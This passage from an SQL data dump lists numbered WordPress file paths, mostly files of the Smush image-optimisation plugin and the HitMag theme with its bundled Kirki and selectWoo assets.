rc/scss/modules/_directory-smush.scss'),(3408,'wp-content/plugins/wp-smushit/_src/scss/modules/_media.scss'),(3409,'wp-content/plugins/wp-smushit/_src/scss/modules/_variables.scss'),(3410,'wp-content/plugins/wp-smushit/_src/scss/modules/_webp.scss'),(3411,'wp-content/plugins/wp-smushit/_src/scss/resize-detection.scss'),(3412,'wp-content/plugins/wp-smushit/app/assets/css/smush-admin.min.css'),(3413,'wp-content/plugins/wp-smushit/app/assets/css/smush-admin.min.css.map'),(3414,'wp-content/plugins/wp-smushit/app/assets/css/smush-global.min.css'),(3415,'wp-content/plugins/wp-smushit/app/assets/css/smush-global.min.css.map'),(3416,'wp-content/plugins/wp-smushit/app/assets/css/smush-rd.min.css'),(3417,'wp-content/plugins/wp-smushit/app/assets/css/smush-rd.min.css.map'),(3418,'wp-content/plugins/wp-smushit/app/assets/fonts/smush-graphic-dashboard-summary.svg'),(3419,'wp-content/plugins/wp-smushit/app/assets/fonts/widget-background-smush.svg'),(3420,'wp-content/plugins/wp-smushit/app/assets/fonts/wpmudev-plugin-icons.eot'),(3421,'wp-content/plugins/wp-smushit/app/assets/fonts/wpmudev-plugin-icons.svg'),(3422,'wp-content/plugins/wp-smushit/app/assets/fonts/wpmudev-plugin-icons.ttf'),(3423,'wp-content/plugins/wp-smushit/app/assets/fonts/wpmudev-plugin-icons.woff'),(3424,'wp-content/plugins/wp-smushit/app/assets/fonts/wpmudev-plugin-icons.woff2'),(3425,'wp-content/plugins/wp-smushit/app/assets/images/chrome-logo.png'),(3426,'wp-content/plugins/wp-smushit/app/assets/images/chrome-logo@2x.png'),(3427,'wp-content/plugins/wp-smushit/app/assets/images/dev-team.png'),(3428,'wp-content/plugins/wp-smushit/app/assets/images/dev-team@2x.png'),(3429,'wp-content/plugins/wp-smushit/app/assets/images/firefox-logo.png'),(3430,'wp-content/plugins/wp-smushit/app/assets/images/firefox-logo@2x.png'),(3431,'wp-content/plugins/wp-smushit/app/assets/images/folder-closed.svg'),(3432,'wp-content/plugins/wp-smushit/app/assets/images/graphic-hb-minify-summary@2x.png'),(3433,'wp-content/plugins/wp-smushit/app/assets/images/graphic-smush-cdn-default.png'),(3434,'wp-content/plugins/wp-smushit/app/assets/images/graphic-smush-cdn-default@2x.png'),(3435,'wp-content/plugins/wp-smushit/app/assets/images/graphic-smush-lazyload-default.png'),(3436,'wp-content/plugins/wp-smushit/app/assets/images/graphic-smush-lazyload-default@2x.png'),(3437,'wp-content/plugins/wp-smushit/app/assets/images/hero.png'),(3438,'wp-content/plugins/wp-smushit/app/assets/images/hero@2x.png'),(3439,'wp-content/plugins/wp-smushit/app/assets/images/icons-rtl.gif'),(3440,'wp-content/plugins/wp-smushit/app/assets/images/icons.gif'),(3441,'wp-content/plugins/wp-smushit/app/assets/images/incsub-logo.png'),(3442,'wp-content/plugins/wp-smushit/app/assets/images/incsub-logo@2x.png'),(3443,'wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-auto.png'),(3444,'wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-auto@2x.png'),(3445,'wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-lazy_load.png'),(3446,'wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-lazy_load@2x.png'),(3447,'wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-lossy.png'),(3448,'wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-lossy@2x.png'),(3449,'wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-original.png'),(3450,'wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-original@2x.png'),(3451,'wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-start.png'),(3452,'wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-start@2x.png'),(3453,'wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-strip_exif.png'),(3454,'wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-strip_exif@2x.png'),(3455,'wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-usage.png'),(3456,'wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding-usage@2x.png'),(3457,'wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding.png'),(3458,'wp-content/plugins/wp-smushit/app/assets/images/onboarding/graphic-onboarding@2x.png'),(3459,'wp-content/plugins/wp-smushit/app/assets/images/opera-logo.png'),(3460,'wp-content/plugins/wp-smushit/app/assets/images/opera-logo@2x.png'),(3461,'wp-content/plugins/wp-smushit/app/assets/images/plugins-defender-icon.png'),(3462,'wp-content/plugins/wp-smushit/app/assets/images/plugins-defender-icon@2x.png'),(3463,'wp-content/plugins/wp-smushit/app/assets/images/plugins-defender.jpg'),(3464,'wp-content/plugins/wp-smushit/app/assets/images/plugins-hummingbird-icon.png'),(3465,'wp-content/plugins/wp-smushit/app/assets/images/plugins-hummingbird-icon@2x.png'),(3466,'wp-content/plugins/wp-smushit/app/assets/images/plugins-hummingbird.jpg'),(3467,'wp-content/plugins/wp-smushit/app/assets/images/plugins-smartcrawl-icon.png'),(3468,'wp-content/plugins/wp-smushit/app/assets/images/plugins-smartcrawl-icon@2x.png'),(3469,'wp-content/plugins/wp-smushit/app/assets/images/plugins-smartcrawl.jpg'),(3470,'wp-content/plugins/wp-smushit/app/assets/images/select-arrow.png'),(3471,'wp-content/plugins/wp-smushit/app/assets/images/select-arrow@2x.png'),(3472,'wp-content/plugins/wp-smushit/app/assets/images/smush-config-icon@2x.png'),(3473,'wp-content/plugins/wp-smushit/app/assets/images/smush-graphic-bulksmush-upsell@2x.png'),(3474,'wp-content/plugins/wp-smushit/app/assets/images/smush-graphic-dashboard-summary.svg'),(3475,'wp-content/plugins/wp-smushit/app/assets/images/smush-graphic-integrations-upsell.png'),(3476,'wp-content/plugins/wp-smushit/app/assets/images/smush-graphic-integrations-upsell@2x.png'),(3477,'wp-content/plugins/wp-smushit/app/assets/images/smush-graphic-summary.png'),(3478,'wp-content/plugins/wp-smushit/app/assets/images/smush-graphic-summary@2x.png'),(3479,'wp-content/plugins/wp-smushit/app/assets/images/smush-lazyloader-1.gif'),(3480,'wp-content/plugins/wp-smushit/app/assets/images/smush-lazyloader-2.gif'),(3481,'wp-content/plugins/wp-smushit/app/assets/images/smush-lazyloader-3.gif'),(3482,'wp-content/plugins/wp-smushit/app/assets/images/smush-lazyloader-4.gif'),(3483,'wp-content/plugins/wp-smushit/app/assets/images/smush-lazyloader-5.gif'),(3484,'wp-content/plugins/wp-smushit/app/assets/images/smush-no-media.png'),(3485,'wp-content/plugins/wp-smushit/app/assets/images/smush-placeholder.png'),(3486,'wp-content/plugins/wp-smushit/app/assets/images/smush-promo.png'),(3487,'wp-content/plugins/wp-smushit/app/assets/images/smush-webp-test.png'),(3488,'wp-content/plugins/wp-smushit/app/assets/images/smush-webp-test.png.webp'),(3489,'wp-content/plugins/wp-smushit/app/assets/images/updated/updated.png'),(3490,'wp-content/plugins/wp-smushit/app/assets/images/updated/updated@2x.png'),(3491,'wp-content/plugins/wp-smushit/app/assets/images/vline-rtl.gif'),(3492,'wp-content/plugins/wp-smushit/app/assets/images/vline.gif'),(3493,'wp-content/plugins/wp-smushit/app/assets/js/smush-admin-common.min.js'),(3494,'wp-content/plugins/wp-smushit/app/assets/js/smush-admin-common.min.js.map'),(3495,'wp-content/plugins/wp-smushit/app/assets/js/smush-admin.min.js'),(3496,'wp-content/plugins/wp-smushit/app/assets/js/smush-admin.min.js.map'),(3497,'wp-content/plugins/wp-smushit/app/assets/js/smush-blocks.min.js'),(3498,'wp-content/plugins/wp-smushit/app/assets/js/smush-blocks.min.js.map'),(3499,'wp-content/plugins/wp-smushit/app/assets/js/smush-clipboard.min.js'),(3500,'wp-content/plugins/wp-smushit/app/assets/js/smush-clipboard.min.js.map'),(3501,'wp-content/plugins/wp-smushit/app/assets/js/smush-global.min.js'),(3502,'wp-content/plugins/wp-smushit/app/assets/js/smush-global.min.js.map'),(3503,'wp-content/plugins/wp-smushit/app/assets/js/smush-lazy-load-native.min.js'),(3504,'wp-content/plugins/wp-smushit/app/assets/js/smush-lazy-load-native.min.js.map'),(3505,'wp-content/plugins/wp-smushit/app/assets/js/smush-lazy-load.min.js'),(3506,'wp-content/plugins/wp-smushit/app/assets/js/smush-lazy-load.min.js.map'),(3507,'wp-content/plugins/wp-smushit/app/assets/js/smush-media.min.js'),(3508,'wp-content/plugins/wp-smushit/app/assets/js/smush-media.min.js.map'),(3509,'wp-content/plugins/wp-smushit/app/assets/js/smush-rd.min.js'),(3510,'wp-content/plugins/wp-smushit/app/assets/js/smush-rd.min.js.map'),(3511,'wp-content/plugins/wp-smushit/app/assets/js/smush-react-configs.min.js'),(3512,'wp-content/plugins/wp-smushit/app/assets/js/smush-react-configs.min.js.map'),(3513,'wp-content/plugins/wp-smushit/app/assets/js/smush-react-webp.min.js'),(3514,'wp-content/plugins/wp-smushit/app/assets/js/smush-react-webp.min.js.map'),(3515,'wp-content/plugins/wp-smushit/app/assets/js/smush-sui.min.js'),(3516,'wp-content/plugins/wp-smushit/app/assets/js/smush-sui.min.js.map'),(3517,'wp-content/plugins/wp-smushit/app/assets/js/smush-tutorials.min.js'),(3518,'wp-content/plugins/wp-smushit/app/assets/js/smush-tutorials.min.js.map'),(3519,'wp-content/plugins/wp-smushit/app/class-abstract-page.php'),(3520,'wp-content/plugins/wp-smushit/app/class-abstract-summary-page.php'),(3521,'wp-content/plugins/wp-smushit/app/class-admin.php'),(3522,'wp-content/plugins/wp-smushit/app/class-ajax.php'),(3523,'wp-content/plugins/wp-smushit/app/class-interface-page.php'),(3524,'wp-content/plugins/wp-smushit/app/class-media-library.php'),(3525,'wp-content/plugins/wp-smushit/app/common/all-images-smushed-notice.php'),(3526,'wp-content/plugins/wp-smushit/app/common/footer-links.php'),(3527,'wp-content/plugins/wp-smushit/app/common/footer-plugins-upsell.php'),(3528,'wp-content/plugins/wp-smushit/app/common/meta-box-footer.php'),(3529,'wp-content/plugins/wp-smushit/app/common/progress-bar.php'),(3530,'wp-content/plugins/wp-smushit/app/modals/checking-files.php'),(3531,'wp-content/plugins/wp-smushit/app/modals/directory-list.php'),(3532,'wp-content/plugins/wp-smushit/app/modals/onboarding.php'),(3533,'wp-content/plugins/wp-smushit/app/modals/progress-dialog.php'),(3534,'wp-content/plugins/wp-smushit/app/modals/reset-settings.php'),(3535,'wp-content/plugins/wp-smushit/app/modals/restore-images.php'),(3536,'wp-content/plugins/wp-smushit/app/modals/updated.php'),(3537,'wp-content/plugins/wp-smushit/app/modals/webp-delete-all.php'),(3538,'wp-content/plugins/wp-smushit/app/pages/class-bulk.php'),(3539,'wp-content/plugins/wp-smushit/app/pages/class-cdn.php'),(3540,'wp-content/plugins/wp-smushit/app/pages/class-dashboard.php'),(3541,'wp-content/plugins/wp-smushit/app/pages/class-directory.php'),(3542,'wp-content/plugins/wp-smushit/app/pages/class-integrations.php'),(3543,'wp-content/plugins/wp-smushit/app/pages/class-lazy.php'),(3544,'wp-content/plugins/wp-smushit/app/pages/class-nextgen.php'),(3545,'wp-content/plugins/wp-smushit/app/pages/class-settings.php'),(3546,'wp-content/plugins/wp-smushit/app/pages/class-tools.php'),(3547,'wp-content/plugins/wp-smushit/app/pages/class-tutorials.php'),(3548,'wp-content/plugins/wp-smushit/app/pages/class-upgrade.php'),(3549,'wp-content/plugins/wp-smushit/app/pages/class-webp.php'),(3550,'wp-content/plugins/wp-smushit/app/views/bulk/meta-box-header.php'),(3551,'wp-content/plugins/wp-smushit/app/views/bulk/meta-box.php'),(3552,'wp-content/plugins/wp-smushit/app/views/bulk/upgrade-meta-box.php'),(3553,'wp-content/plugins/wp-smushit/app/views/bulk-settings/meta-box.php'),(3554,'wp-content/plugins/wp-smushit/app/views/cdn/disabled-meta-box.php'),(3555,'wp-content/plugins/wp-smushit/app/views/cdn/meta-box-header.php'),(3556,'wp-content/plugins/wp-smushit/app/views/cdn/meta-box.php'),(3557,'wp-content/plugins/wp-smushit/app/views/cdn/upsell-meta-box.php'),(3558,'wp-content/plugins/wp-smushit/app/views/dashboard/bulk/meta-box.php'),(3559,'wp-content/plugins/wp-smushit/app/views/dashboard/cdn/meta-box-header.php'),(3560,'wp-content/plugins/wp-smushit/app/views/dashboard/cdn/meta-box.php'),(3561,'wp-content/plugins/wp-smushit/app/views/dashboard/directory-meta-box.php'),(3562,'wp-content/plugins/wp-smushit/app/views/dashboard/integrations-meta-box.php'),(3563,'wp-content/plugins/wp-smushit/app/views/dashboard/lazy-load-meta-box.php'),(3564,'wp-content/plugins/wp-smushit/app/views/dashboard/summary-meta-box.php'),(3565,'wp-content/plugins/wp-smushit/app/views/dashboard/tools-meta-box.php'),(3566,'wp-content/plugins/wp-smushit/app/views/dashboard/upsell/meta-box-header.php'),(3567,'wp-content/plugins/wp-smushit/app/views/dashboard/upsell/meta-box.php'),(3568,'wp-content/plugins/wp-smushit/app/views/dashboard/webp/meta-box-header.php'),(3569,'wp-content/plugins/wp-smushit/app/views/dashboard/webp/meta-box.php'),(3570,'wp-content/plugins/wp-smushit/app/views/directory/meta-box.php'),(3571,'wp-content/plugins/wp-smushit/app/views/integrations/meta-box.php'),(3572,'wp-content/plugins/wp-smushit/app/views/lazyload/disabled-meta-box.php'),(3573,'wp-content/plugins/wp-smushit/app/views/lazyload/meta-box.php'),(3574,'wp-content/plugins/wp-smushit/app/views/meta-box.php'),(3575,'wp-content/plugins/wp-smushit/app/views/nextgen/meta-box-header.php'),(3576,'wp-content/plugins/wp-smushit/app/views/nextgen/meta-box.php'),(3577,'wp-content/plugins/wp-smushit/app/views/nextgen/summary-meta-box.php'),(3578,'wp-content/plugins/wp-smushit/app/views/pro-features/meta-box-header.php'),(3579,'wp-content/plugins/wp-smushit/app/views/pro-features/meta-box-upsell.php'),(3580,'wp-content/plugins/wp-smushit/app/views/pro-features/meta-box.php'),(3581,'wp-content/plugins/wp-smushit/app/views/settings/accessibility-meta-box.php'),(3582,'wp-content/plugins/wp-smushit/app/views/settings/data-meta-box.php'),(3583,'wp-content/plugins/wp-smushit/app/views/settings/general-meta-box.php'),(3584,'wp-content/plugins/wp-smushit/app/views/settings/permissions-meta-box.php'),(3585,'wp-content/plugins/wp-smushit/app/views/settings-row.php'),(3586,'wp-content/plugins/wp-smushit/app/views/smush-nextgen-page.php'),(3587,'wp-content/plugins/wp-smushit/app/views/smush-page.php'),(3588,'wp-content/plugins/wp-smushit/app/views/smush-upgrade-page.php'),(3589,'wp-content/plugins/wp-smushit/app/views/summary/meta-box.php'),(3590,'wp-content/plugins/wp-smushit/app/views/tabs.php'),(3591,'wp-content/plugins/wp-smushit/app/views/tools/meta-box.php'),(3592,'wp-content/plugins/wp-smushit/app/views/webp/disabled-meta-box.php'),(3593,'wp-content/plugins/wp-smushit/app/views/webp/meta-box-header.php'),(3594,'wp-content/plugins/wp-smushit/app/views/webp/webp-meta-box.php'),(3595,'wp-content/plugins/wp-smushit/core/api/class-abstract-api.php'),(3596,'wp-content/plugins/wp-smushit/core/api/class-hub.php'),(3597,'wp-content/plugins/wp-smushit/core/api/class-request.php'),(3598,'wp-content/plugins/wp-smushit/core/api/class-smush-api.php'),(3599,'wp-content/plugins/wp-smushit/core/class-cli.php'),(3600,'wp-content/plugins/wp-smushit/core/class-configs.php'),(3601,'wp-content/plugins/wp-smushit/core/class-core.php'),(3602,'wp-content/plugins/wp-smushit/core/class-helper.php'),(3603,'wp-content/plugins/wp-smushit/core/class-installer.php'),(3604,'wp-content/plugins/wp-smushit/core/class-modules.php'),(3605,'wp-content/plugins/wp-smushit/core/class-rest.php'),(3606,'wp-content/plugins/wp-smushit/core/class-settings.php'),(3607,'wp-content/plugins/wp-smushit/core/class-stats.php'),(3608,'wp-content/plugins/wp-smushit/core/external/free-dashboard/README.md'),(3609,'wp-content/plugins/wp-smushit/core/external/free-dashboard/assets/admin.css'),(3610,'wp-content/plugins/wp-smushit/core/external/free-dashboard/assets/admin.js'),(3611,'wp-content/plugins/wp-smushit/core/external/free-dashboard/module.php'),(3612,'wp-content/plugins/wp-smushit/core/external/plugin-notice/README.md'),(3613,'wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/css/notice.css'),(3614,'wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/fonts/wpmudev-close-icon.eot'),(3615,'wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/fonts/wpmudev-close-icon.svg'),(3616,'wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/fonts/wpmudev-close-icon.ttf'),(3617,'wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/fonts/wpmudev-close-icon.woff'),(3618,'wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/fonts/wpmudev-close-icon.woff2'),(3619,'wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/images/plugins-defender.png'),(3620,'wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/images/plugins-forminator.png'),(3621,'wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/images/plugins-hummingbird.png'),(3622,'wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/images/plugins-hustle.png'),(3623,'wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/images/plugins-smartcrawl.png'),(3624,'wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/images/plugins-smush.png'),(3625,'wp-content/plugins/wp-smushit/core/external/plugin-notice/assets/js/notice.js'),(3626,'wp-content/plugins/wp-smushit/core/external/plugin-notice/notice.php'),(3627,'wp-content/plugins/wp-smushit/core/integrations/class-abstract-integration.php'),(3628,'wp-content/plugins/wp-smushit/core/integrations/class-avada.php'),(3629,'wp-content/plugins/wp-smushit/core/integrations/class-common.php'),(3630,'wp-content/plugins/wp-smushit/core/integrations/class-composer.php'),(3631,'wp-content/plugins/wp-smushit/core/integrations/class-envira.php'),(3632,'wp-content/plugins/wp-smushit/core/integrations/class-gutenberg.php'),(3633,'wp-content/plugins/wp-smushit/core/integrations/class-nextgen.php'),(3634,'wp-content/plugins/wp-smushit/core/integrations/class-s3.php'),(3635,'wp-content/plugins/wp-smushit/core/integrations/nextgen/class-admin.php'),(3636,'wp-content/plugins/wp-smushit/core/integrations/nextgen/class-stats.php'),(3637,'wp-content/plugins/wp-smushit/core/integrations/nextgen/class-thumbs.php'),(3638,'wp-content/plugins/wp-smushit/core/integrations/s3/class-compat.php'),(3639,'wp-content/plugins/wp-smushit/core/modules/async/class-abstract-async.php'),(3640,'wp-content/plugins/wp-smushit/core/modules/async/class-async.php'),(3641,'wp-content/plugins/wp-smushit/core/modules/async/class-editor.php'),(3642,'wp-content/plugins/wp-smushit/core/modules/class-abstract-module.php'),(3643,'wp-content/plugins/wp-smushit/core/modules/class-backup.php'),(3644,'wp-content/plugins/wp-smushit/core/modules/class-cdn.php'),(3645,'wp-content/plugins/wp-smushit/core/modules/class-dir.php'),(3646,'wp-content/plugins/wp-smushit/core/modules/class-lazy.php'),(3647,'wp-content/plugins/wp-smushit/core/modules/class-png2jpg.php'),(3648,'wp-content/plugins/wp-smushit/core/modules/class-resize-detection.php'),(3649,'wp-content/plugins/wp-smushit/core/modules/class-resize.php'),(3650,'wp-content/plugins/wp-smushit/core/modules/class-smush.php'),(3651,'wp-content/plugins/wp-smushit/core/modules/class-webp.php'),(3652,'wp-content/plugins/wp-smushit/core/modules/helpers/class-dscanner.php'),(3653,'wp-content/plugins/wp-smushit/core/modules/helpers/class-iterator.php'),(3654,'wp-content/plugins/wp-smushit/core/modules/helpers/class-parser.php'),(3655,'wp-content/plugins/wp-smushit/languages/wp-smushit.pot'),(3656,'wp-content/plugins/wp-smushit/readme.txt'),(3657,'wp-content/plugins/wp-smushit/uninstall.php'),(3658,'wp-content/plugins/wp-smushit/wp-smush.php'),(3659,'wp-content/themes/hitmag/404.php'),(3660,'wp-content/themes/hitmag/archive.php'),(3661,'wp-content/themes/hitmag/comments.php'),(3662,'wp-content/themes/hitmag/css/customizer.css'),(3663,'wp-content/themes/hitmag/css/editor-blocks.css'),(3664,'wp-content/themes/hitmag/css/editor-style.css'),(3665,'wp-content/themes/hitmag/css/flexslider.css'),(3666,'wp-content/themes/hitmag/css/font-awesome.css'),(3667,'wp-content/themes/hitmag/css/font-awesome.min.css'),(3668,'wp-content/themes/hitmag/css/magnific-popup.css'),(3669,'wp-content/themes/hitmag/fonts/FontAwesome.otf'),(3670,'wp-content/themes/hitmag/fonts/fontawesome-webfont.eot'),(3671,'wp-content/themes/hitmag/fonts/fontawesome-webfont.svg'),(3672,'wp-content/themes/hitmag/fonts/fontawesome-webfont.ttf'),(3673,'wp-content/themes/hitmag/fonts/fontawesome-webfont.woff'),(3674,'wp-content/themes/hitmag/fonts/fontawesome-webfont.woff2'),(3675,'wp-content/themes/hitmag/footer.php'),(3676,'wp-content/themes/hitmag/functions.php'),(3677,'wp-content/themes/hitmag/header.php'),(3678,'wp-content/themes/hitmag/images/slide-thumb.jpg'),(3679,'wp-content/themes/hitmag/images/slide.jpg'),(3680,'wp-content/themes/hitmag/inc/block-styles.php'),(3681,'wp-content/themes/hitmag/inc/class-meta-boxes.php'),(3682,'wp-content/themes/hitmag/inc/custom-header.php'),(3683,'wp-content/themes/hitmag/inc/customizer/assets/imgs/1c.png'),(3684,'wp-content/themes/hitmag/inc/customizer/assets/imgs/1cc.png'),(3685,'wp-content/themes/hitmag/inc/customizer/assets/imgs/2cl.png'),(3686,'wp-content/themes/hitmag/inc/customizer/assets/imgs/2cr.png'),(3687,'wp-content/themes/hitmag/inc/customizer/assets/js/customize-controls.js'),(3688,'wp-content/themes/hitmag/inc/customizer/custom-controls/class-upsell-customize.php'),(3689,'wp-content/themes/hitmag/inc/customizer/custom-controls/control-category-dropdown.php'),(3690,'wp-content/themes/hitmag/inc/customizer/custom-controls/section-pro.php'),(3691,'wp-content/themes/hitmag/inc/customizer/customizer.php'),(3692,'wp-content/themes/hitmag/inc/customizer/kirki-config.php'),(3693,'wp-content/themes/hitmag/inc/customizer/styles.php'),(3694,'wp-content/themes/hitmag/inc/dashboard/css/admin.css'),(3695,'wp-content/themes/hitmag/inc/dashboard/theme-info.php'),(3696,'wp-content/themes/hitmag/inc/extras.php'),(3697,'wp-content/themes/hitmag/inc/jetpack.php'),(3698,'wp-content/themes/hitmag/inc/kirki/CHANGELOG.md'),(3699,'wp-content/themes/hitmag/inc/kirki/LICENSE'),(3700,'wp-content/themes/hitmag/inc/kirki/assets/images/1c.png'),(3701,'wp-content/themes/hitmag/inc/kirki/assets/images/2cl.png'),(3702,'wp-content/themes/hitmag/inc/kirki/assets/images/2cr.png'),(3703,'wp-content/themes/hitmag/inc/kirki/assets/images/3cl.png'),(3704,'wp-content/themes/hitmag/inc/kirki/assets/images/3cm.png'),(3705,'wp-content/themes/hitmag/inc/kirki/assets/images/3cr.png'),(3706,'wp-content/themes/hitmag/inc/kirki/assets/images/jquery.fs.stepper-arrows.png'),(3707,'wp-content/themes/hitmag/inc/kirki/assets/images/kirki-bottom.png'),(3708,'wp-content/themes/hitmag/inc/kirki/assets/images/kirki-bottom.svg'),(3709,'wp-content/themes/hitmag/inc/kirki/assets/images/kirki-logo.svg'),(3710,'wp-content/themes/hitmag/inc/kirki/assets/vendor/fontawesome/fontawesome.json'),(3711,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/css/select2.css'),(3712,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/css/select2.min.css'),(3713,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/css/selectWoo.css'),(3714,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/css/selectWoo.min.css'),(3715,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/ar.js'),(3716,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/az.js'),(3717,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/bg.js'),(3718,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/ca.js'),(3719,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/cs.js'),(3720,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/da.js'),(3721,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/de.js'),(3722,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/el.js'),(3723,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/en.js'),(3724,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/es.js'),(3725,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/et.js'),(3726,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/eu.js'),(3727,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/fa.js'),(3728,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/fi.js'),(3729,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/fr.js'),(3730,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/gl.js'),(3731,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/he.js'),(3732,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/hi.js'),(3733,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/hr.js'),(3734,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/hu.js'),(3735,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/hy.js'),(3736,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/id.js'),(3737,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/is.js'),(3738,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/it.js'),(3739,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/ja.js'),(3740,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/km.js'),(3741,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/ko.js'),(3742,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/lt.js'),(3743,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/lv.js'),(3744,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/mk.js'),(3745,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/ms.js'),(3746,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/nb.js'),(3747,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/nl.js'),(3748,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/pl.js'),(3749,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/pt-BR.js'),(3750,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/pt.js'),(3751,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/ro.js'),(3752,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/ru.js'),(3753,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/sk.js'),(3754,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/sl.js'),(3755,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/sr-Cyrl.js'),(3756,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/sr.js'),(3757,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/sv.js'),(3758,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/th.js'),(3759,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/tr.js'),(3760,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/uk.js'),(3761,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/vi.js'),(3762,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/zh-CN.js'),(3763,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/i18n/zh-TW.js'),(3764,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/select2.full.js'),(3765,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/select2.full.min.js'),(3766,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/select2.js'),(3767,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/select2.min.js'),(3768,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/selectWoo.full.js'),(3769,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/selectWoo.full.min.js'),(3770,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/selectWoo.js'),(3771,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/js/selectWoo.min.js'),(3772,'wp-content/themes/hitmag/inc/kirki/assets/vendor/selectWoo/kirki.css'),(3773,'wp-content/themes/hitmag/inc/kirki/assets/vendor/wp-color-picker-alpha/wp-color-picker-alpha.js'),(3774,'wp-content/themes/hitmag/inc/kirki/class-kirki-autoload.php'),(3775,'wp-